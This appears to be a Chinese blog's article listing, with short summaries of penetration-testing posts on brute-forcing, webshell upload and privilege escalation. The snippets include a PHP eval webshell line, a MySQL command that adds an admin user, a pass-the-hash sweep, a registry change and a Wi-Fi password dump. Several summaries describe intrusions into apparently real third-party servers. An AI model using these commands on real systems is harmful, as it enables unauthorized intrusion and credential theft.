自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(86)
  • 收藏
  • 关注

原创 kali下安装go

请注意,go1.17.6.linux-amd64.tar.gz 是当前 Go 版本的示例文件名。你可以在 https://golang.org/dl/ 上找到最新版本的下载链接。安装完成后,你就可以在Kali Linux上开始使用Go编程语言了。(3)设置Go语言的环境变量。安装完成后,你就可以在Kali Linux上开始使用Go编程语言了。apt将自动下载并安装Go编程语言及其相关依赖项。确认Go已成功安装。如果Go已成功安装,将显示Go的版本号。有的需要安装gccgo。

2024-02-27 20:12:59 762

原创 kali配置ssh

update-rc.d ssh enable 或者 sudo systemctl enable ssh 开机自启动。/etc/init.d/ssh status 或者 service ssh status。4.查看ssh启动状态。

2024-02-27 19:33:48 485

原创 HackBrowserData

HackBrowserData支持提取多种主流浏览器的数据,包括但不限于Chrome、Firefox、Edge、Opera和Safari。它提供了简单易用的命令行界面,可以根据特定的需求选择提取特定浏览器的数据。该工具还有一些高级功能,如导出数据到CSV、JSON或SQLite文件,以便进一步分析和处理。同时,它还支持使用密码解密算法来还原加密的密码。

2024-01-31 16:59:41 1060

原创 使用subdomainsBrute进行域名及子域名信息收集

subdomainsBrute是一款用Python编写的子域名爆破工具。它可以根据提供的字典文件,快速扫描给定域名可能存在的子域名。该工具使用多线程技术进行扫描,提高了扫描效率,并支持将结果输出到文件中以便进一步处理和分析。subdomainsBrute相对于在线查询工具来说更为全面,并且不受权限限制。它提供了更广泛的查询结果,而不仅仅局限于已经授权的子域名。然而,该工具在查询速度上可能存在一定限制,如果扫描的子域名数量较多,查询进度可能会比较慢。

2024-01-31 16:57:03 1120

原创 dnsenum信息收集

dnsenum是一个用于获取域名相关信息的工具,它也可以用于在DNS服务器上暴力破解子域。它是一个多线程perl脚本,可以收集A记录并查询Google或wordlist来发现子域。它还可以获取主机地址、namservers、MX记录,执行axfr查询并获取BIND版本,通过google抓取获取额外的名称和子域,对具有NS记录的子域执行递归,计算C类域网络范围并对它们执行whois查询,对网络范围执行反向查找,并将结果写入domain_ips.txt文件。

2023-12-19 13:50:58 1717

原创 Apache HTTPD 换行解析漏洞(CVE-2017-15715)复现及利用

CVE-2017-15715漏洞可能允许攻击者通过构造特定的恶意文件名来绕过服务器对文件上传的安全限制。在Apache HTTP Server的某些版本中,指令用于匹配文件名模式并执行相应的操作。然而,在某些情况下,该指令可能会错误地将"“字符解释为文件名的一部分,而不是将其视为表示文件名结束的特殊字符。这可能导致服务器错误地匹配到包含”“字符的文件名,即使该文件名后面还有更多的字符。攻击者可以利用这个漏洞在服务器上上传恶意文件。

2023-12-08 09:04:36 298

原创 webpack代码泄露漏洞研究

Webpack的核心运行时代码位于node_modules/webpack/lib目录下,攻击者可以通过读取该目录下的代码来获取有关应用程序的敏感数据,例如加密密钥或访问令牌。攻击者可以读取配置文件获取这些敏感信息。Retire.js是用于检测JavaScript库和框架中存在的已知漏洞的工具,可以扫描Webpack打包的应用程序中使用的依赖库是否存在已知的漏洞。Dependency-check是用于检测应用程序中依赖库漏洞的工具,可以扫描Webpack打包的应用程序中使用的依赖库是否存在已知的漏洞。

2023-09-15 14:43:08 1190

原创 Oracle密码暴力破解及提权

使用以下命令进行暴力破解,其中USER_FILE为用户名字典文件的路径,PASSWORD_FILE为密码字典文件的路径,IP_ADDRESS为目标机器的IP地址,PORT为目标Oracle数据库的监听端口号。TOra是一种开源的Oracle管理工具,可用于管理Oracle数据库。如果已知用户名,可以使用以下命令进行暴力破解,其中USERNAME为目标账户名、PASSWORD_FILE为密码字典文件的路径,IP_ADDRESS为目标机器的IP地址,PORT为目标Oracle数据库的监听端口号。

2023-09-15 14:37:58 274

原创 三种Tomcat密码暴力破解技术研究

设置系统代码模式,通过Burpsuite进行抓包,如图6所示,在Request中可以看到“Authorization: Basic YWRtaW46YWRtaW4=”。例如搜索韩国范围内存在的Apache Tomcat 则为:“Apache Tomcat” && country=“KR”,搜索效果如图1所示。Fofa等资产测绘系统收集的资产信息可能随着时间的变化有些可能已经不存在了,因此需要进行查看,如图2所示,表示可以访问。在页面中单击“Host Manager”,如图3所示,表示该后台地址不可用。

2023-09-15 14:31:47 189

原创 kali安装go

(1)打开 Go 官方下载页面。https://golang.org/dl/(2)根据系统架构选择适合的版本(通常是 Linux x86-64)。如果显示了 Go 的版本信息,则安装成功。三.使用 snap 包管理器安装。curl -O (3)在终端中下载 Go。(4)解压 Go 压缩包。一、通过apt命令安装。2.安装golang。

2023-09-15 14:10:03 283

原创 命令行下设置环境变量

现在,您已经通过命令行成功设置了名为 JAVA_HOME 的系统变量,并将 %JAVA_HOME%\bin 添加到了系统的 Path 环境变量中。这样,在命令行终端中就可以直接使用 java、javac 等 Java 工具命令了。请注意,在实际操作中,请替换 C:\Program Files\Java\jdk1.8.0_191 为您所安装 JDK 的实际路径。接下来,将 %JAVA_HOME%\bin 添加到 Path 环境变量中,以便找到 Java 工具命令。

2023-09-11 16:01:24 505

原创 WordPress拿WebShell

在获取Webshell的情况下,对现有信息的分析和利用,有可能获取WordPress后台管理密码。将鼠标移动到上传的Webshell记录上,可以看到有三个按钮“編輯”、“刪除”和“查看”,单击查看即可访问Webshell的具体页面,如图5所示,选择记录中的链接,该链接地址即为真正的Webshell地址。在WordPress管理页面的左边单击“媒体”-“新增媒体案”,接着就会出来一个上传的界面,在该界面中选择“Browser 上傳功能”,如图3所示,直接选择php的Webshell上传即可。

2023-07-20 08:35:46 326

原创 Citrix密码绕过漏洞引发的渗透

前面的进入的日文的Citrix服务器,看不懂,后面换了一台英文版本的进行测试,如图7所示,通过热键“CTRL+F3”打开远程计算机上的任务管理器,然后在任务管理器中“文件”-“新建任务”-“打开”,在其中输入“cmd.exe”或者“Explorer”直接打开命令提示符或者资源管理器,如图7所示,通过运行“Explorer”进入对方计算机。即在出现确定的连接后,使用热键“CTRL+F3”打开远程的任务管理器,如图6所示,直接调出远程的任务管理器,呵呵,还是小日本的计算机呢!(2)服务器端ICA软件。

2023-07-20 08:33:25 476

原创 利用Art2008cms漏洞渗透某站点

单击“基本设置”-“添加文章”,在文章添加页面中单击“插入FLV视频”,选择一个已经更名为mdb的Webshell上传,如图2所示,选择文件后单击开始上传,上传完毕后会自动显示文件上传后的详细地址“/uploadfile/Media/201106/2011061515303758472.mdb”,记下该地址,留作后用。数据库恢复成功后,由于用来恢复的数据库是Webshell,非真实的数据库文件,因此当数据库恢复成功后,后台管理会保错,导致后台无法管理,网站也无法正常访问,如图5所示。CurrPath=…

2023-07-20 08:31:14 127

原创 Phpcms2008sp4管理员提权0day

先从需要替换的文件中,选定一个独立段的注释性文字,例如“//MemCache服务器配置”,然后回到木马扫描结果文件列表中,并选中需要替换的文件,并从单击“批量替换”,接着会出来一个文件替换页面,如图7所示,在替换成文本框中输入“eval($_POST[‘antian365.com’]);Phpcms2008sp4中还提供了系统的路径等信息,该模块也在系统设置中,单击系统环境检测,如图10所示,即可操作系统类型,网站的真实物理地址等信息,这些信息对于提权来说至关重要。图1 获取phpcms的版本号。

2023-07-20 08:28:53 112

原创 如何检查计算机账号克隆

在系统中添加的非克隆账号,可以通过常规检查检查出来,但是如果入侵者在系统中对账号进行了克隆,一般克隆系统中已经存在账号,例如克隆aspnet账号、TsInternetuser、Guest等账号,通过“net user”、“net localgroup administrators”以及计算用户图形管理都是查不出来的,如果计算机开放了远程终端、安装了PcanyWhere等工具,则入侵者可以通过这些用户账号正常访问系统。如果在检查过程中,发现了多余的账号,则极有可能是入侵者添加的账号。图2 管理员组账号检查。

2023-07-19 10:27:51 409

原创 操作系统密码安全设置研究

如果将密码历史设置为 0,用户将不必选择新密码。(3) 社会工程学的又一次完美诠释:通过各种手段取得内网管理员或用户的信任,获得他的信息,比如QQ,Email,Msn等等,抓住他的弱点,或是心理,降低他的心理防线,在成熟的时候发送Url,或是打包的软件里捆绑木马等,内网将面临又一次的攻击。在“组策略”窗口的左侧展开“计算机配置”→“Windows设置”→“安全设置”→“账户策略”→“密码策略”在右边窗格中就会出现一系列的密码设置项,经过这里的配置,可以建立一个完备的密码策略,使密码得到最大限度的保护。

2023-07-19 10:25:07 93

原创 Jboss信息查看获取Webshell

通过“ls-al”来获取当前路径下的文件和目录名称,完整命令为“ls -al /opt/jboss-4.0.5.GA/”,通过在绝对路径中添加新的路径来获取Jboss部署的路径,“/opt/jboss-4.0.5.GA /server/default/deploy/”,如图6所示,显示的分为文件和目录,目录是以d开头的。部署路径下的目录有两种一种是“filename.war”,另外一种是系统自带的,例如“management”目录就是管理默认目录,如图7所示,该目录已经被部署了好几个shell。

2023-07-19 10:23:23 450

原创 Pr提权渗透国外某高速服务器

(2)hzhost管理系统的渗透方法,通过Asp.net的Webshell查看进程来获取hzhost的物理路径,如果能够访问hzhost的物理路径,则可以下载其管理所用的数据库表site.mdb,在site.mdb数据库中会保存root和sa用户的密码,掌握了MySQL和MSSQL的管理员密码后,可以尝试数据库提权,从而获得管理员权限。通过查看AWS扫描结果,发现该网站存在直接文件上传地址,在AWS中选中该页面直接进行浏览测试,如图2所示,能够正常访问,且未做安全验证测试。(1)扫描工具不是万能。

2023-07-12 08:55:26 128

原创 Windows2008中 Magic Winmail Server提权

Winmail的配置文件保存在“G:/Winmail/server/”目录,也即安装目录下的Server子目录,“userauth.cfg”文件为邮箱用户口令配置,邮箱登陆用户名为之间的字符串,如图8所示,本例中的用户为postmaster,用户密码为md5后的字符串“8ed44440b3e4077a782ff5cc5348e366”,Winmail还有其它加密方式,如果password之间为md5,则表示为md5加密,否则为相应的加密方式。最后单击“连接”进行登录测试,如图7所示,成功登录该服务器。

2023-07-12 08:52:44 105

原创 Serv-u 提权

在asp.net的webshell中,单击“Cmdshell”,在CmdPath中将cmd.exe修改为net或者net.exe,然后在“Argument”中输入“net localgroup administrators”,最后单击“Submit”查看管理员用户组,如图1所示,一共有4个管理员用户。打开远程终端登录窗口,在连接地址中输入“xxx.xxx.xxx.xxx:53389”如图7所示,输入刚才添加的用户名和密码,成功登录远程终端,说明Serv-u提权成功。图7 Serv-U提权成功。

2023-07-12 08:48:42 323

原创 Mysql数据库提权

Root用户的密码还可能从网页脚本文件中获得,数据库连接直接使用root用户。分别在查询中输入脚本“select shell(‘cmd’,‘net user temp temp123456’)”、“select shell(‘cmd’,'net localgroup administrators temp /add ')”并执行该查询命令,如果执行成功,则表示在系统中添加“temp”用户,密码为“temp123456”,同时将该用户添加到管理员组中,使其具备管理员权限,执行成功后如图5,图6所示。

2023-07-12 08:46:47 1105

原创 Microsoft SQL Server 2005提权

REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode。crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup。

2023-07-12 08:45:01 74

转载 内网PTH攻击

REG ADD “HKLM\System\CurrentControlSet\Control\Lsa” /v DisableRestrictedAdmin /t REG_DWORD /d 00000000 /f //开启Restricted Admin mode。crackmapexec smb 192.168.100.0/24 -u administrator -H NTLM-HASH.txt(收集到的hash字典) -x whoami -d workgroup。

2023-05-25 13:55:33 262

原创 notepad++删除行尾特殊字符

notepad++删除行尾特殊字符。替换中输入 .{1}$替换模式选择正则表达式。

2023-01-18 11:51:07 1357

原创 MySQL创建中文表名报错(Error Code:1005 Can‘t create table .. errno:22)

MySQL创建中文表名报错(Error Code:1005 Can’t create table …原因是中文名字问题,原来是4个中文名,修改中文名为5个汉字即可。也有导入是5个汉字的,修改为4个即可。

2023-01-18 11:49:31 467 1

原创 web后台登录口令暴力破解及防御

在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。1.1web后台账号及密码获取思路1.通过sql注入获取后台账号及密码如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。2.通过跨站获取管理员帐

2023-01-06 20:56:01 6897

原创 国内/国外常见搜索引擎

7.知网学术搜索(可以获取系统架构、网络架构、作者等重要信息)searxng 一个尊重隐私、可二次开发的元搜索引擎。8.文书网(最近不好用,搜索无效果,查询既往判例)4、头条搜索 so.toutiao.com。6、谷歌搜索 www.google.com。2、360搜索 www.so.com,3、必应搜索 www.bing.com。1、百度 www.baidu.com。5、神马搜索 m.sm.cn。无追让你的搜索,不再被追踪。搜索的微信公众号搜索不错。6.神马搜索,手机端搜索。一个好用的"程序员搜索"

2022-10-17 22:05:23 1686700 4

原创 威胁情报分析平台

对目前公开的威胁情报平台进行搜集,在进行信息收集时,可以充分利用这些平台进行查询,获取更多的信息。6.天际友盟RedQueen安全智能服务平台。4、Threatcrowd 开源威胁情报。3.venuseye威胁情报平台。3、SANS互联网风暴中心。7.奇安信威胁情报中心。一、国内威胁情报平台。2.绿盟威胁情报平台。4.安恒威胁情报平台。5.微步威胁情报平台。8.安天威胁情报中心。二、国外威胁情报平台。

2022-10-17 22:04:13 439

原创 内网及外网mssql口令扫描渗透

执行systeminfo | find "86"获取信息中会显示Family等字样,如图15所示,则表明该操作系统是X86系统,否则使用systeminfo | find "64"命令来获取该架构为X64架构,然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。在SQL连接设置中分别填入IP地址“192.100.100.33”,密码“lo*******”,如图4所示,单击连接,如果密码正确则会提示连接成功,然后执行”dir c:\”命令来测试是否可以执行DOS命令。

2022-10-05 19:53:48 242

原创 通过python脚本批量下载本地文件中的图片文件

1.准备工作将所有需要下载的url图片地址编辑成一个文件。一行为一个pic地址。2.将文件保存为pic_data.txt文件3.将以下代码保存为downloadpic.py4.执行脚本python downloadpic.py注意,python代码文件一定要utf编码from urllib.request import urlretrieveimport osimport sslssl._create_default_https_context = ssl._create_unverified

2022-07-12 10:16:59 1136 2

原创 自动及手动获取计算机mac地址及无线密码

自动及手动获取计算机mac地址及无线密码1.手动获取(1)获取无线网络信息netsh wlan show profiles(2)对某个网络获取密码其中xxxxx为网络名字netsh wlan show profiles name=“XXXXXX” key=clear2.自动获取所有网络密码for /f “skip=9 tokens=1,2 delims=:” %i in (‘netsh wlan show profiles’) do @echo %j | findstr -i -v echo

2022-06-17 12:40:19 309

原创 大数据去重处理思路及实践

在处理数据过程中经常会遇到数据去重处理,数据量小的可以通过查询去重来处理,对于数据量比较大的,通过数据库来处理,相对比较麻烦,主要在于硬件支持。下面笔者分享一个数据处理思路: 1.工具 (1)通过penetestbox提供的linux环境 (2)notepad++ (3)大文本编辑器EmEditor 2.处理思路及要求 (1)数据格式统一,需要处理的数据格式是一致的。字段类型一致,字段一致。 (2)通过linux命令进行去重排序 cat *.txt >all.txt..

2021-08-05 12:42:43 1042

转载 银行正则表达式

var bankcardList = [{bankName: “中国邮政储蓄银行”,bankCode: “PSBC”,patterns: [{reg: /^(621096|621098|622150|622151|622181|622188|622199|955100|621095|620062|621285|621798|621799|621797|620529|621622|621599|621674|623218|623219)\d{13}KaTeX parse error: Expected

2021-07-16 14:11:14 1875

原创 密码攻防系列文章27-web后台登录口令暴力破解及防御

在实际网络安全评估测试中,前台是给用户使用,后台是给网站管理维护人员使用,前台功能相对简单,后台功能相对复杂,可能保护媒体文件上传,数据库管理等。前台用户可以自由注册,而后台是网站管理或者维护人员设定,渗透中如果能够拿到后台管理员帐号及密码,则意味着离获取webshell权限更进一步了。27.1web后台账号及密码获取思路1.通过sql注入获取后台账号及密码如果网站存在sql注入漏洞,则可以通过sqlmap等工具进行漏洞测试,通过dump命令来获取整个数据库或者某个表中的数据。2.通过跨站获取管理员

2021-06-19 22:07:27 1944

原创 windows系统哈希值校验及删除同名重复文件

微软自带工具certutil所有命令可参见系统自带帮助,通俗易懂。CertUtil [选项] -hashfile InFile [HashAlgorithm MD5/SHA1/SHA256]使用自带工具进行哈希校验,算法必须大写CertUtil -hashfile temp.doc MD5 计算temp.doc的md5值也可以用来验证删除是否多余相同文件。通过比对md5值,相同则是相同文件,否则不是。...

2021-06-19 21:59:36 693

searchsploit漏洞搜索使用技巧

在提权过程中需要通过掌握的信息来对系统、软件等存在的漏洞进行搜索,获取其利用的poc,通过编译后,实施提权。searchsploit提供漏洞本地和在线查询,是渗透测试中提权的重要武器。1.1searchsploit简介Exploit Database(https://github.com/offensive-security/exploit-database)这是Offensive Security(https://www.offensive-security.com/)赞助的一个项目。存储了大量的漏洞

2021-06-19 21:55:50 969

原创 Redis漏洞利用与防御

Redis在大公司被大量应用,通过笔者的研究发现,目前在互联网上已经出现Redis未经授权病毒似自动攻击,攻击成功后会对内网进行扫描、控制、感染以及用来进行挖矿、勒索等恶意行为,早期网上曾经分析过一篇文章“通过redis感染linux版本勒索病毒的服务器”(http://www.sohu.com/a/143409075_765820),如果公司使用了Redis,那么应当给予重视,通过实际研究,当在一定条件下,攻击者可以获取webshell,甚至root权限。1.1.1 Redis简介及搭建实验环境RE

2021-06-19 21:45:11 156

原创 批量更改MySQL数据库引擎查询

将数据库中表引擎为InnoDB修改为MyISAM:SET @DATABASE_NAME = ‘test20210328’;SELECT CONCAT(‘ALTER TABLE ', table_name, ' ENGINE=MyISAM;’) AS sql_statementsFROM information_schema.tables AS tbWHERE table_schema = @DATABASE_NAMEAND ENGINE = ‘InnoDB’AND T

2021-03-28 17:28:46 132 1

原创 23.国外14亿泄露数据下载及还原

2018年6月10日freebuf发布了篇文章《14亿邮箱泄露密码明文信息查询网站惊现网络》(链接地址:http://www.freebuf.com/news/174410.html),声称其泄露的数据可以通过暗网网站(http://dumpedlqezarfife.onion.lu/)进行查询,后续通过网络获取其泄露文件的下载地址,历经千辛万苦,终于将数据下载到本地,通过研究,将其txt文件进行还原处理,并对其进行无效数据处理,去除空密码等操作。1.1.1数据下载及分析1.数据下载地址(1)二进.

2021-02-05 20:07:13 3480

Th3inspector

"Th3inspector" 是一款网络安全工具,它提供了多种信息收集和漏洞扫描的功能,包括: 网站信息收集:可以获取目标网站的 Whois 信息、IP 地址、端口状态、SSL 证书等基本信息。 DNS 搜索:可以查询目标域名下的子域名,并进行爆破和漏洞扫描。 端口扫描:可以对目标 IP 地址进行端口扫描,并识别可能存在的漏洞和弱密码。 SQL 注入扫描:可以检测目标网站是否存在 SQL 注入漏洞,并提供简单的自动化攻击功能。 暴力破解:可以使用字典或自定义密码列表进行弱密码破解,支持 FTP、SSH、Telnet、SMTP、MySQL 等多种服务的密码猜测。

2023-05-26

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除